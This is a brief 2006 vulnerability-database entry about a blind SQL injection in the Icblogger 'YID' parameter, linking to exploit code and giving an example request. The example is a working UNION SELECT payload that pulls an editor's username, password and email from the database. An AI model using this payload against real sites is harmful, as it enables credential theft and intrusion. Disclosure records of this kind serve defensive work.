Icblogger <= "YID" Remote Blind SQL Injection

2006-09-02T00:00:00
ID SECURITYVULNS:DOC:14122
Type securityvulns
Reporter Securityvulns
Modified 2006-09-02T00:00:00

Description

Code :

http://www.brimstonemastiffs.com/icblogger.txt

Example :

http://www.exploitw0rld.com/devam.asp?YID=-1 UNION SELECT null,null,null,null,null,editor_adi,null,editor_sifre,editor_mail,null FROM editor WHERE editor_id = 1